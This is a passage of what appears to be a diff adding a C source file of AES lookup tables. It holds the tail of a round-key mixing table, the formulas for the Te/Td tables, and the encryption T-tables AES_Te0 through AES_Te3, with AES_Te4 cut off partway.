x=D1 */ + { 0x10187DA7, 0xA710187D, 0x7DA71018, 0x187DA710, }, /* x=D2 */ + { 0x1E1170AC, 0xAC1E1170, 0x70AC1E11, 0x1170AC1E, }, /* x=D3 */ + { 0x342E539D, 0x9D342E53, 0x539D342E, 0x2E539D34, }, /* x=D4 */ + { 0x3A275E96, 0x963A275E, 0x5E963A27, 0x275E963A, }, /* x=D5 */ + { 0x283C498B, 0x8B283C49, 0x498B283C, 0x3C498B28, }, /* x=D6 */ + { 0x26354480, 0x80263544, 0x44802635, 0x35448026, }, /* x=D7 */ + { 0x7C420FE9, 0xE97C420F, 0x0FE97C42, 0x420FE97C, }, /* x=D8 */ + { 0x724B02E2, 0xE2724B02, 0x02E2724B, 0x4B02E272, }, /* x=D9 */ + { 0x605015FF, 0xFF605015, 0x15FF6050, 0x5015FF60, }, /* x=DA */ + { 0x6E5918F4, 0xF46E5918, 0x18F46E59, 0x5918F46E, }, /* x=DB */ + { 0x44663BC5, 0xC544663B, 0x3BC54466, 0x663BC544, }, /* x=DC */ + { 0x4A6F36CE, 0xCE4A6F36, 0x36CE4A6F, 0x6F36CE4A, }, /* x=DD */ + { 0x587421D3, 0xD3587421, 0x21D35874, 0x7421D358, }, /* x=DE */ + { 0x567D2CD8, 0xD8567D2C, 0x2CD8567D, 0x7D2CD856, }, /* x=DF */ + { 0x37A10C7A, 0x7A37A10C, 0x0C7A37A1, 0xA10C7A37, }, /* x=E0 */ + { 0x39A80171, 0x7139A801, 0x017139A8, 0xA8017139, }, /* x=E1 */ + { 0x2BB3166C, 0x6C2BB316, 0x166C2BB3, 0xB3166C2B, }, /* x=E2 */ + { 0x25BA1B67, 0x6725BA1B, 0x1B6725BA, 0xBA1B6725, }, /* x=E3 */ + { 0x0F853856, 0x560F8538, 0x38560F85, 0x8538560F, }, /* x=E4 */ + { 0x018C355D, 0x5D018C35, 0x355D018C, 0x8C355D01, }, /* x=E5 */ + { 0x13972240, 0x40139722, 0x22401397, 0x97224013, }, /* x=E6 */ + { 0x1D9E2F4B, 0x4B1D9E2F, 0x2F4B1D9E, 0x9E2F4B1D, }, /* x=E7 */ + { 0x47E96422, 0x2247E964, 0x642247E9, 0xE9642247, }, /* x=E8 */ + { 0x49E06929, 0x2949E069, 0x692949E0, 0xE0692949, }, /* x=E9 */ + { 0x5BFB7E34, 0x345BFB7E, 0x7E345BFB, 0xFB7E345B, }, /* x=EA */ + { 0x55F2733F, 0x3F55F273, 0x733F55F2, 0xF2733F55, }, /* x=EB */ + { 0x7FCD500E, 0x0E7FCD50, 0x500E7FCD, 0xCD500E7F, }, /* x=EC */ + { 0x71C45D05, 0x0571C45D, 0x5D0571C4, 0xC45D0571, }, /* x=ED */ + { 0x63DF4A18, 0x1863DF4A, 0x4A1863DF, 0xDF4A1863, }, /* x=EE */ + { 0x6DD64713, 0x136DD647, 0x47136DD6, 0xD647136D, }, /* x=EF */ + { 
0xD731DCCA, 0xCAD731DC, 0xDCCAD731, 0x31DCCAD7, }, /* x=F0 */ + { 0xD938D1C1, 0xC1D938D1, 0xD1C1D938, 0x38D1C1D9, }, /* x=F1 */ + { 0xCB23C6DC, 0xDCCB23C6, 0xC6DCCB23, 0x23C6DCCB, }, /* x=F2 */ + { 0xC52ACBD7, 0xD7C52ACB, 0xCBD7C52A, 0x2ACBD7C5, }, /* x=F3 */ + { 0xEF15E8E6, 0xE6EF15E8, 0xE8E6EF15, 0x15E8E6EF, }, /* x=F4 */ + { 0xE11CE5ED, 0xEDE11CE5, 0xE5EDE11C, 0x1CE5EDE1, }, /* x=F5 */ + { 0xF307F2F0, 0xF0F307F2, 0xF2F0F307, 0x07F2F0F3, }, /* x=F6 */ + { 0xFD0EFFFB, 0xFBFD0EFF, 0xFFFBFD0E, 0x0EFFFBFD, }, /* x=F7 */ + { 0xA779B492, 0x92A779B4, 0xB492A779, 0x79B492A7, }, /* x=F8 */ + { 0xA970B999, 0x99A970B9, 0xB999A970, 0x70B999A9, }, /* x=F9 */ + { 0xBB6BAE84, 0x84BB6BAE, 0xAE84BB6B, 0x6BAE84BB, }, /* x=FA */ + { 0xB562A38F, 0x8FB562A3, 0xA38FB562, 0x62A38FB5, }, /* x=FB */ + { 0x9F5D80BE, 0xBE9F5D80, 0x80BE9F5D, 0x5D80BE9F, }, /* x=FC */ + { 0x91548DB5, 0xB591548D, 0x8DB59154, 0x548DB591, }, /* x=FD */ + { 0x834F9AA8, 0xA8834F9A, 0x9AA8834F, 0x4F9AA883, }, /* x=FE */ + { 0x8D4697A3, 0xA38D4697, 0x97A38D46, 0x4697A38D, }, /* x=FF */ +}; + + + +/* +AES_Te0[x] = S [x].[02, 01, 01, 03]; +AES_Te1[x] = S [x].[03, 02, 01, 01]; +AES_Te2[x] = S [x].[01, 03, 02, 01]; +AES_Te3[x] = S [x].[01, 01, 03, 02]; +AES_Te4[x] = S [x].[01, 01, 01, 01]; + +AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; +AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; +AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; +AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; +AES_Td4[x] = Si[x].[01, 01, 01, 01]; +*/ + +const uint32_t AES_Te0[256] = { + 0xc66363a5U, 0xf87c7c84U, 0xee777799U, 0xf67b7b8dU, + 0xfff2f20dU, 0xd66b6bbdU, 0xde6f6fb1U, 0x91c5c554U, + 0x60303050U, 0x02010103U, 0xce6767a9U, 0x562b2b7dU, + 0xe7fefe19U, 0xb5d7d762U, 0x4dababe6U, 0xec76769aU, + 0x8fcaca45U, 0x1f82829dU, 0x89c9c940U, 0xfa7d7d87U, + 0xeffafa15U, 0xb25959ebU, 0x8e4747c9U, 0xfbf0f00bU, + 0x41adadecU, 0xb3d4d467U, 0x5fa2a2fdU, 0x45afafeaU, + 0x239c9cbfU, 0x53a4a4f7U, 0xe4727296U, 0x9bc0c05bU, + 0x75b7b7c2U, 0xe1fdfd1cU, 0x3d9393aeU, 0x4c26266aU, + 0x6c36365aU, 
0x7e3f3f41U, 0xf5f7f702U, 0x83cccc4fU, + 0x6834345cU, 0x51a5a5f4U, 0xd1e5e534U, 0xf9f1f108U, + 0xe2717193U, 0xabd8d873U, 0x62313153U, 0x2a15153fU, + 0x0804040cU, 0x95c7c752U, 0x46232365U, 0x9dc3c35eU, + 0x30181828U, 0x379696a1U, 0x0a05050fU, 0x2f9a9ab5U, + 0x0e070709U, 0x24121236U, 0x1b80809bU, 0xdfe2e23dU, + 0xcdebeb26U, 0x4e272769U, 0x7fb2b2cdU, 0xea75759fU, + 0x1209091bU, 0x1d83839eU, 0x582c2c74U, 0x341a1a2eU, + 0x361b1b2dU, 0xdc6e6eb2U, 0xb45a5aeeU, 0x5ba0a0fbU, + 0xa45252f6U, 0x763b3b4dU, 0xb7d6d661U, 0x7db3b3ceU, + 0x5229297bU, 0xdde3e33eU, 0x5e2f2f71U, 0x13848497U, + 0xa65353f5U, 0xb9d1d168U, 0x00000000U, 0xc1eded2cU, + 0x40202060U, 0xe3fcfc1fU, 0x79b1b1c8U, 0xb65b5bedU, + 0xd46a6abeU, 0x8dcbcb46U, 0x67bebed9U, 0x7239394bU, + 0x944a4adeU, 0x984c4cd4U, 0xb05858e8U, 0x85cfcf4aU, + 0xbbd0d06bU, 0xc5efef2aU, 0x4faaaae5U, 0xedfbfb16U, + 0x864343c5U, 0x9a4d4dd7U, 0x66333355U, 0x11858594U, + 0x8a4545cfU, 0xe9f9f910U, 0x04020206U, 0xfe7f7f81U, + 0xa05050f0U, 0x783c3c44U, 0x259f9fbaU, 0x4ba8a8e3U, + 0xa25151f3U, 0x5da3a3feU, 0x804040c0U, 0x058f8f8aU, + 0x3f9292adU, 0x219d9dbcU, 0x70383848U, 0xf1f5f504U, + 0x63bcbcdfU, 0x77b6b6c1U, 0xafdada75U, 0x42212163U, + 0x20101030U, 0xe5ffff1aU, 0xfdf3f30eU, 0xbfd2d26dU, + 0x81cdcd4cU, 0x180c0c14U, 0x26131335U, 0xc3ecec2fU, + 0xbe5f5fe1U, 0x359797a2U, 0x884444ccU, 0x2e171739U, + 0x93c4c457U, 0x55a7a7f2U, 0xfc7e7e82U, 0x7a3d3d47U, + 0xc86464acU, 0xba5d5de7U, 0x3219192bU, 0xe6737395U, + 0xc06060a0U, 0x19818198U, 0x9e4f4fd1U, 0xa3dcdc7fU, + 0x44222266U, 0x542a2a7eU, 0x3b9090abU, 0x0b888883U, + 0x8c4646caU, 0xc7eeee29U, 0x6bb8b8d3U, 0x2814143cU, + 0xa7dede79U, 0xbc5e5ee2U, 0x160b0b1dU, 0xaddbdb76U, + 0xdbe0e03bU, 0x64323256U, 0x743a3a4eU, 0x140a0a1eU, + 0x924949dbU, 0x0c06060aU, 0x4824246cU, 0xb85c5ce4U, + 0x9fc2c25dU, 0xbdd3d36eU, 0x43acacefU, 0xc46262a6U, + 0x399191a8U, 0x319595a4U, 0xd3e4e437U, 0xf279798bU, + 0xd5e7e732U, 0x8bc8c843U, 0x6e373759U, 0xda6d6db7U, + 0x018d8d8cU, 0xb1d5d564U, 0x9c4e4ed2U, 0x49a9a9e0U, + 0xd86c6cb4U, 
0xac5656faU, 0xf3f4f407U, 0xcfeaea25U, + 0xca6565afU, 0xf47a7a8eU, 0x47aeaee9U, 0x10080818U, + 0x6fbabad5U, 0xf0787888U, 0x4a25256fU, 0x5c2e2e72U, + 0x381c1c24U, 0x57a6a6f1U, 0x73b4b4c7U, 0x97c6c651U, + 0xcbe8e823U, 0xa1dddd7cU, 0xe874749cU, 0x3e1f1f21U, + 0x964b4bddU, 0x61bdbddcU, 0x0d8b8b86U, 0x0f8a8a85U, + 0xe0707090U, 0x7c3e3e42U, 0x71b5b5c4U, 0xcc6666aaU, + 0x904848d8U, 0x06030305U, 0xf7f6f601U, 0x1c0e0e12U, + 0xc26161a3U, 0x6a35355fU, 0xae5757f9U, 0x69b9b9d0U, + 0x17868691U, 0x99c1c158U, 0x3a1d1d27U, 0x279e9eb9U, + 0xd9e1e138U, 0xebf8f813U, 0x2b9898b3U, 0x22111133U, + 0xd26969bbU, 0xa9d9d970U, 0x078e8e89U, 0x339494a7U, + 0x2d9b9bb6U, 0x3c1e1e22U, 0x15878792U, 0xc9e9e920U, + 0x87cece49U, 0xaa5555ffU, 0x50282878U, 0xa5dfdf7aU, + 0x038c8c8fU, 0x59a1a1f8U, 0x09898980U, 0x1a0d0d17U, + 0x65bfbfdaU, 0xd7e6e631U, 0x844242c6U, 0xd06868b8U, + 0x824141c3U, 0x299999b0U, 0x5a2d2d77U, 0x1e0f0f11U, + 0x7bb0b0cbU, 0xa85454fcU, 0x6dbbbbd6U, 0x2c16163aU, +}; +const uint32_t AES_Te1[256] = { + 0xa5c66363U, 0x84f87c7cU, 0x99ee7777U, 0x8df67b7bU, + 0x0dfff2f2U, 0xbdd66b6bU, 0xb1de6f6fU, 0x5491c5c5U, + 0x50603030U, 0x03020101U, 0xa9ce6767U, 0x7d562b2bU, + 0x19e7fefeU, 0x62b5d7d7U, 0xe64dababU, 0x9aec7676U, + 0x458fcacaU, 0x9d1f8282U, 0x4089c9c9U, 0x87fa7d7dU, + 0x15effafaU, 0xebb25959U, 0xc98e4747U, 0x0bfbf0f0U, + 0xec41adadU, 0x67b3d4d4U, 0xfd5fa2a2U, 0xea45afafU, + 0xbf239c9cU, 0xf753a4a4U, 0x96e47272U, 0x5b9bc0c0U, + 0xc275b7b7U, 0x1ce1fdfdU, 0xae3d9393U, 0x6a4c2626U, + 0x5a6c3636U, 0x417e3f3fU, 0x02f5f7f7U, 0x4f83ccccU, + 0x5c683434U, 0xf451a5a5U, 0x34d1e5e5U, 0x08f9f1f1U, + 0x93e27171U, 0x73abd8d8U, 0x53623131U, 0x3f2a1515U, + 0x0c080404U, 0x5295c7c7U, 0x65462323U, 0x5e9dc3c3U, + 0x28301818U, 0xa1379696U, 0x0f0a0505U, 0xb52f9a9aU, + 0x090e0707U, 0x36241212U, 0x9b1b8080U, 0x3ddfe2e2U, + 0x26cdebebU, 0x694e2727U, 0xcd7fb2b2U, 0x9fea7575U, + 0x1b120909U, 0x9e1d8383U, 0x74582c2cU, 0x2e341a1aU, + 0x2d361b1bU, 0xb2dc6e6eU, 0xeeb45a5aU, 0xfb5ba0a0U, + 0xf6a45252U, 0x4d763b3bU, 
0x61b7d6d6U, 0xce7db3b3U, + 0x7b522929U, 0x3edde3e3U, 0x715e2f2fU, 0x97138484U, + 0xf5a65353U, 0x68b9d1d1U, 0x00000000U, 0x2cc1ededU, + 0x60402020U, 0x1fe3fcfcU, 0xc879b1b1U, 0xedb65b5bU, + 0xbed46a6aU, 0x468dcbcbU, 0xd967bebeU, 0x4b723939U, + 0xde944a4aU, 0xd4984c4cU, 0xe8b05858U, 0x4a85cfcfU, + 0x6bbbd0d0U, 0x2ac5efefU, 0xe54faaaaU, 0x16edfbfbU, + 0xc5864343U, 0xd79a4d4dU, 0x55663333U, 0x94118585U, + 0xcf8a4545U, 0x10e9f9f9U, 0x06040202U, 0x81fe7f7fU, + 0xf0a05050U, 0x44783c3cU, 0xba259f9fU, 0xe34ba8a8U, + 0xf3a25151U, 0xfe5da3a3U, 0xc0804040U, 0x8a058f8fU, + 0xad3f9292U, 0xbc219d9dU, 0x48703838U, 0x04f1f5f5U, + 0xdf63bcbcU, 0xc177b6b6U, 0x75afdadaU, 0x63422121U, + 0x30201010U, 0x1ae5ffffU, 0x0efdf3f3U, 0x6dbfd2d2U, + 0x4c81cdcdU, 0x14180c0cU, 0x35261313U, 0x2fc3ececU, + 0xe1be5f5fU, 0xa2359797U, 0xcc884444U, 0x392e1717U, + 0x5793c4c4U, 0xf255a7a7U, 0x82fc7e7eU, 0x477a3d3dU, + 0xacc86464U, 0xe7ba5d5dU, 0x2b321919U, 0x95e67373U, + 0xa0c06060U, 0x98198181U, 0xd19e4f4fU, 0x7fa3dcdcU, + 0x66442222U, 0x7e542a2aU, 0xab3b9090U, 0x830b8888U, + 0xca8c4646U, 0x29c7eeeeU, 0xd36bb8b8U, 0x3c281414U, + 0x79a7dedeU, 0xe2bc5e5eU, 0x1d160b0bU, 0x76addbdbU, + 0x3bdbe0e0U, 0x56643232U, 0x4e743a3aU, 0x1e140a0aU, + 0xdb924949U, 0x0a0c0606U, 0x6c482424U, 0xe4b85c5cU, + 0x5d9fc2c2U, 0x6ebdd3d3U, 0xef43acacU, 0xa6c46262U, + 0xa8399191U, 0xa4319595U, 0x37d3e4e4U, 0x8bf27979U, + 0x32d5e7e7U, 0x438bc8c8U, 0x596e3737U, 0xb7da6d6dU, + 0x8c018d8dU, 0x64b1d5d5U, 0xd29c4e4eU, 0xe049a9a9U, + 0xb4d86c6cU, 0xfaac5656U, 0x07f3f4f4U, 0x25cfeaeaU, + 0xafca6565U, 0x8ef47a7aU, 0xe947aeaeU, 0x18100808U, + 0xd56fbabaU, 0x88f07878U, 0x6f4a2525U, 0x725c2e2eU, + 0x24381c1cU, 0xf157a6a6U, 0xc773b4b4U, 0x5197c6c6U, + 0x23cbe8e8U, 0x7ca1ddddU, 0x9ce87474U, 0x213e1f1fU, + 0xdd964b4bU, 0xdc61bdbdU, 0x860d8b8bU, 0x850f8a8aU, + 0x90e07070U, 0x427c3e3eU, 0xc471b5b5U, 0xaacc6666U, + 0xd8904848U, 0x05060303U, 0x01f7f6f6U, 0x121c0e0eU, + 0xa3c26161U, 0x5f6a3535U, 0xf9ae5757U, 0xd069b9b9U, + 0x91178686U, 0x5899c1c1U, 
0x273a1d1dU, 0xb9279e9eU, + 0x38d9e1e1U, 0x13ebf8f8U, 0xb32b9898U, 0x33221111U, + 0xbbd26969U, 0x70a9d9d9U, 0x89078e8eU, 0xa7339494U, + 0xb62d9b9bU, 0x223c1e1eU, 0x92158787U, 0x20c9e9e9U, + 0x4987ceceU, 0xffaa5555U, 0x78502828U, 0x7aa5dfdfU, + 0x8f038c8cU, 0xf859a1a1U, 0x80098989U, 0x171a0d0dU, + 0xda65bfbfU, 0x31d7e6e6U, 0xc6844242U, 0xb8d06868U, + 0xc3824141U, 0xb0299999U, 0x775a2d2dU, 0x111e0f0fU, + 0xcb7bb0b0U, 0xfca85454U, 0xd66dbbbbU, 0x3a2c1616U, +}; +const uint32_t AES_Te2[256] = { + 0x63a5c663U, 0x7c84f87cU, 0x7799ee77U, 0x7b8df67bU, + 0xf20dfff2U, 0x6bbdd66bU, 0x6fb1de6fU, 0xc55491c5U, + 0x30506030U, 0x01030201U, 0x67a9ce67U, 0x2b7d562bU, + 0xfe19e7feU, 0xd762b5d7U, 0xabe64dabU, 0x769aec76U, + 0xca458fcaU, 0x829d1f82U, 0xc94089c9U, 0x7d87fa7dU, + 0xfa15effaU, 0x59ebb259U, 0x47c98e47U, 0xf00bfbf0U, + 0xadec41adU, 0xd467b3d4U, 0xa2fd5fa2U, 0xafea45afU, + 0x9cbf239cU, 0xa4f753a4U, 0x7296e472U, 0xc05b9bc0U, + 0xb7c275b7U, 0xfd1ce1fdU, 0x93ae3d93U, 0x266a4c26U, + 0x365a6c36U, 0x3f417e3fU, 0xf702f5f7U, 0xcc4f83ccU, + 0x345c6834U, 0xa5f451a5U, 0xe534d1e5U, 0xf108f9f1U, + 0x7193e271U, 0xd873abd8U, 0x31536231U, 0x153f2a15U, + 0x040c0804U, 0xc75295c7U, 0x23654623U, 0xc35e9dc3U, + 0x18283018U, 0x96a13796U, 0x050f0a05U, 0x9ab52f9aU, + 0x07090e07U, 0x12362412U, 0x809b1b80U, 0xe23ddfe2U, + 0xeb26cdebU, 0x27694e27U, 0xb2cd7fb2U, 0x759fea75U, + 0x091b1209U, 0x839e1d83U, 0x2c74582cU, 0x1a2e341aU, + 0x1b2d361bU, 0x6eb2dc6eU, 0x5aeeb45aU, 0xa0fb5ba0U, + 0x52f6a452U, 0x3b4d763bU, 0xd661b7d6U, 0xb3ce7db3U, + 0x297b5229U, 0xe33edde3U, 0x2f715e2fU, 0x84971384U, + 0x53f5a653U, 0xd168b9d1U, 0x00000000U, 0xed2cc1edU, + 0x20604020U, 0xfc1fe3fcU, 0xb1c879b1U, 0x5bedb65bU, + 0x6abed46aU, 0xcb468dcbU, 0xbed967beU, 0x394b7239U, + 0x4ade944aU, 0x4cd4984cU, 0x58e8b058U, 0xcf4a85cfU, + 0xd06bbbd0U, 0xef2ac5efU, 0xaae54faaU, 0xfb16edfbU, + 0x43c58643U, 0x4dd79a4dU, 0x33556633U, 0x85941185U, + 0x45cf8a45U, 0xf910e9f9U, 0x02060402U, 0x7f81fe7fU, + 0x50f0a050U, 0x3c44783cU, 0x9fba259fU, 
0xa8e34ba8U, + 0x51f3a251U, 0xa3fe5da3U, 0x40c08040U, 0x8f8a058fU, + 0x92ad3f92U, 0x9dbc219dU, 0x38487038U, 0xf504f1f5U, + 0xbcdf63bcU, 0xb6c177b6U, 0xda75afdaU, 0x21634221U, + 0x10302010U, 0xff1ae5ffU, 0xf30efdf3U, 0xd26dbfd2U, + 0xcd4c81cdU, 0x0c14180cU, 0x13352613U, 0xec2fc3ecU, + 0x5fe1be5fU, 0x97a23597U, 0x44cc8844U, 0x17392e17U, + 0xc45793c4U, 0xa7f255a7U, 0x7e82fc7eU, 0x3d477a3dU, + 0x64acc864U, 0x5de7ba5dU, 0x192b3219U, 0x7395e673U, + 0x60a0c060U, 0x81981981U, 0x4fd19e4fU, 0xdc7fa3dcU, + 0x22664422U, 0x2a7e542aU, 0x90ab3b90U, 0x88830b88U, + 0x46ca8c46U, 0xee29c7eeU, 0xb8d36bb8U, 0x143c2814U, + 0xde79a7deU, 0x5ee2bc5eU, 0x0b1d160bU, 0xdb76addbU, + 0xe03bdbe0U, 0x32566432U, 0x3a4e743aU, 0x0a1e140aU, + 0x49db9249U, 0x060a0c06U, 0x246c4824U, 0x5ce4b85cU, + 0xc25d9fc2U, 0xd36ebdd3U, 0xacef43acU, 0x62a6c462U, + 0x91a83991U, 0x95a43195U, 0xe437d3e4U, 0x798bf279U, + 0xe732d5e7U, 0xc8438bc8U, 0x37596e37U, 0x6db7da6dU, + 0x8d8c018dU, 0xd564b1d5U, 0x4ed29c4eU, 0xa9e049a9U, + 0x6cb4d86cU, 0x56faac56U, 0xf407f3f4U, 0xea25cfeaU, + 0x65afca65U, 0x7a8ef47aU, 0xaee947aeU, 0x08181008U, + 0xbad56fbaU, 0x7888f078U, 0x256f4a25U, 0x2e725c2eU, + 0x1c24381cU, 0xa6f157a6U, 0xb4c773b4U, 0xc65197c6U, + 0xe823cbe8U, 0xdd7ca1ddU, 0x749ce874U, 0x1f213e1fU, + 0x4bdd964bU, 0xbddc61bdU, 0x8b860d8bU, 0x8a850f8aU, + 0x7090e070U, 0x3e427c3eU, 0xb5c471b5U, 0x66aacc66U, + 0x48d89048U, 0x03050603U, 0xf601f7f6U, 0x0e121c0eU, + 0x61a3c261U, 0x355f6a35U, 0x57f9ae57U, 0xb9d069b9U, + 0x86911786U, 0xc15899c1U, 0x1d273a1dU, 0x9eb9279eU, + 0xe138d9e1U, 0xf813ebf8U, 0x98b32b98U, 0x11332211U, + 0x69bbd269U, 0xd970a9d9U, 0x8e89078eU, 0x94a73394U, + 0x9bb62d9bU, 0x1e223c1eU, 0x87921587U, 0xe920c9e9U, + 0xce4987ceU, 0x55ffaa55U, 0x28785028U, 0xdf7aa5dfU, + 0x8c8f038cU, 0xa1f859a1U, 0x89800989U, 0x0d171a0dU, + 0xbfda65bfU, 0xe631d7e6U, 0x42c68442U, 0x68b8d068U, + 0x41c38241U, 0x99b02999U, 0x2d775a2dU, 0x0f111e0fU, + 0xb0cb7bb0U, 0x54fca854U, 0xbbd66dbbU, 0x163a2c16U, +}; +const uint32_t AES_Te3[256] = { + + 
0x6363a5c6U, 0x7c7c84f8U, 0x777799eeU, 0x7b7b8df6U, + 0xf2f20dffU, 0x6b6bbdd6U, 0x6f6fb1deU, 0xc5c55491U, + 0x30305060U, 0x01010302U, 0x6767a9ceU, 0x2b2b7d56U, + 0xfefe19e7U, 0xd7d762b5U, 0xababe64dU, 0x76769aecU, + 0xcaca458fU, 0x82829d1fU, 0xc9c94089U, 0x7d7d87faU, + 0xfafa15efU, 0x5959ebb2U, 0x4747c98eU, 0xf0f00bfbU, + 0xadadec41U, 0xd4d467b3U, 0xa2a2fd5fU, 0xafafea45U, + 0x9c9cbf23U, 0xa4a4f753U, 0x727296e4U, 0xc0c05b9bU, + 0xb7b7c275U, 0xfdfd1ce1U, 0x9393ae3dU, 0x26266a4cU, + 0x36365a6cU, 0x3f3f417eU, 0xf7f702f5U, 0xcccc4f83U, + 0x34345c68U, 0xa5a5f451U, 0xe5e534d1U, 0xf1f108f9U, + 0x717193e2U, 0xd8d873abU, 0x31315362U, 0x15153f2aU, + 0x04040c08U, 0xc7c75295U, 0x23236546U, 0xc3c35e9dU, + 0x18182830U, 0x9696a137U, 0x05050f0aU, 0x9a9ab52fU, + 0x0707090eU, 0x12123624U, 0x80809b1bU, 0xe2e23ddfU, + 0xebeb26cdU, 0x2727694eU, 0xb2b2cd7fU, 0x75759feaU, + 0x09091b12U, 0x83839e1dU, 0x2c2c7458U, 0x1a1a2e34U, + 0x1b1b2d36U, 0x6e6eb2dcU, 0x5a5aeeb4U, 0xa0a0fb5bU, + 0x5252f6a4U, 0x3b3b4d76U, 0xd6d661b7U, 0xb3b3ce7dU, + 0x29297b52U, 0xe3e33eddU, 0x2f2f715eU, 0x84849713U, + 0x5353f5a6U, 0xd1d168b9U, 0x00000000U, 0xeded2cc1U, + 0x20206040U, 0xfcfc1fe3U, 0xb1b1c879U, 0x5b5bedb6U, + 0x6a6abed4U, 0xcbcb468dU, 0xbebed967U, 0x39394b72U, + 0x4a4ade94U, 0x4c4cd498U, 0x5858e8b0U, 0xcfcf4a85U, + 0xd0d06bbbU, 0xefef2ac5U, 0xaaaae54fU, 0xfbfb16edU, + 0x4343c586U, 0x4d4dd79aU, 0x33335566U, 0x85859411U, + 0x4545cf8aU, 0xf9f910e9U, 0x02020604U, 0x7f7f81feU, + 0x5050f0a0U, 0x3c3c4478U, 0x9f9fba25U, 0xa8a8e34bU, + 0x5151f3a2U, 0xa3a3fe5dU, 0x4040c080U, 0x8f8f8a05U, + 0x9292ad3fU, 0x9d9dbc21U, 0x38384870U, 0xf5f504f1U, + 0xbcbcdf63U, 0xb6b6c177U, 0xdada75afU, 0x21216342U, + 0x10103020U, 0xffff1ae5U, 0xf3f30efdU, 0xd2d26dbfU, + 0xcdcd4c81U, 0x0c0c1418U, 0x13133526U, 0xecec2fc3U, + 0x5f5fe1beU, 0x9797a235U, 0x4444cc88U, 0x1717392eU, + 0xc4c45793U, 0xa7a7f255U, 0x7e7e82fcU, 0x3d3d477aU, + 0x6464acc8U, 0x5d5de7baU, 0x19192b32U, 0x737395e6U, + 0x6060a0c0U, 0x81819819U, 0x4f4fd19eU, 0xdcdc7fa3U, + 
0x22226644U, 0x2a2a7e54U, 0x9090ab3bU, 0x8888830bU, + 0x4646ca8cU, 0xeeee29c7U, 0xb8b8d36bU, 0x14143c28U, + 0xdede79a7U, 0x5e5ee2bcU, 0x0b0b1d16U, 0xdbdb76adU, + 0xe0e03bdbU, 0x32325664U, 0x3a3a4e74U, 0x0a0a1e14U, + 0x4949db92U, 0x06060a0cU, 0x24246c48U, 0x5c5ce4b8U, + 0xc2c25d9fU, 0xd3d36ebdU, 0xacacef43U, 0x6262a6c4U, + 0x9191a839U, 0x9595a431U, 0xe4e437d3U, 0x79798bf2U, + 0xe7e732d5U, 0xc8c8438bU, 0x3737596eU, 0x6d6db7daU, + 0x8d8d8c01U, 0xd5d564b1U, 0x4e4ed29cU, 0xa9a9e049U, + 0x6c6cb4d8U, 0x5656faacU, 0xf4f407f3U, 0xeaea25cfU, + 0x6565afcaU, 0x7a7a8ef4U, 0xaeaee947U, 0x08081810U, + 0xbabad56fU, 0x787888f0U, 0x25256f4aU, 0x2e2e725cU, + 0x1c1c2438U, 0xa6a6f157U, 0xb4b4c773U, 0xc6c65197U, + 0xe8e823cbU, 0xdddd7ca1U, 0x74749ce8U, 0x1f1f213eU, + 0x4b4bdd96U, 0xbdbddc61U, 0x8b8b860dU, 0x8a8a850fU, + 0x707090e0U, 0x3e3e427cU, 0xb5b5c471U, 0x6666aaccU, + 0x4848d890U, 0x03030506U, 0xf6f601f7U, 0x0e0e121cU, + 0x6161a3c2U, 0x35355f6aU, 0x5757f9aeU, 0xb9b9d069U, + 0x86869117U, 0xc1c15899U, 0x1d1d273aU, 0x9e9eb927U, + 0xe1e138d9U, 0xf8f813ebU, 0x9898b32bU, 0x11113322U, + 0x6969bbd2U, 0xd9d970a9U, 0x8e8e8907U, 0x9494a733U, + 0x9b9bb62dU, 0x1e1e223cU, 0x87879215U, 0xe9e920c9U, + 0xcece4987U, 0x5555ffaaU, 0x28287850U, 0xdfdf7aa5U, + 0x8c8c8f03U, 0xa1a1f859U, 0x89898009U, 0x0d0d171aU, + 0xbfbfda65U, 0xe6e631d7U, 0x4242c684U, 0x6868b8d0U, + 0x4141c382U, 0x9999b029U, 0x2d2d775aU, 0x0f0f111eU, + 0xb0b0cb7bU, 0x5454fca8U, 0xbbbbd66dU, 0x16163a2cU, +}; +const uint32_t AES_Te4[256] = { + 0x63636363U, 0x7c7c7c7cU, 0x77777777U, 0x7b7b7b7bU, + 0xf2f2f2f2U, 0x6b6b6b6bU, 0x6f6f6f6fU, 0xc5c5c5c5U, + 0x30303030U, 0x01010101U, 0x67676767U, 0x2b2b2b2bU, + 0xfefefefeU, 0xd7d7d7d7U, 0xababababU, 0x76767676U, + 0xcacacacaU, 0x82828282U, 0xc9c9c9c9U, 0x7d7d7d7dU, + 0xfafafafaU, 0x59595959U, 0x47474747U, 0xf0f0f0f0U, + 0xadadadadU, 0xd4d4d4d4U, 0xa2a2a2a2U, 0xafafafafU, + 0x9c9c9c9cU, 0xa4a4a4a4U, 0x72727272U, 0xc0c0c0c0U, + 0xb7b7b7b7U, 0xfdfdfdfdU, 0x93939393U, 0x26262626U, + 0x36363636U, 
0x3f3f3f3fU, 0xf7f7f7f7U, 0xccccccccU, + 0x34343434U, 0xa5a5a5a5U, 0xe5e5e5e5U, 0xf1f1f1f1U, + 0x71717171U, 0xd8d8d8d8U, 0x31313131U, 0x15151515U, + 0x04040404U, 0xc7c7c7c7U, 0x23232323U, 0xc3c3c3c3U, + 0x18181818U, 0x96969696U, 0x05050505U, 0x9a9a9a9aU, + 0x07070707U, 0x12121212U, 0x80808080U, 0xe2e2e2e2U, + 0xebebebebU, 0x27272727U, 0xb2b2b2b2U, 0x75757575U, + 0x09090909U, 0x83838383U, 0x2c2c2c2cU, 0x1a1a1a1aU, + 0x1b1b1b1bU, 0x6e6e6e6eU, 0x5a5a5a5aU, 0xa0a0a0a0U, + 0x52525252U, 0x3b3b3b3bU, 0xd6d6d6d6U, 0xb3b3b3b3U, + 0x29292929U, 0xe3e3e3e3U, 0x2f2f2f2fU, 0x84848484U, + 0x53535353U, 0xd1d1d1d1U, 0x00000000U, 0xededededU, + 0x20202020U, 0xfcfcfcfcU, 0xb1b1b1b1U, 0x5b5b5b5bU, + 0x6a6a6a6aU, 0xcbcbcbcbU, 0xbebebebeU, 0x39393939U, + 0x4a4a4a4aU, 0x4c4c4c4cU, 0x58585858U, 0xcfcfcfcfU, + 0xd0d0d0d0U, 0xefefefefU, 0xaaaaaaaaU, 0xfbfbfbfbU, + 0x43434343U, 0x4d4d4d4dU, 0x33333333U, 0x85858585U, + 0x45454545U, 0xf9f9f9f9U, 0x02020202U, 0x7f7f7f7fU, + 0x50505050U, 0x3c3c3c3cU, 0x9f9f9f9fU, 0xa8a8a8a8U, + 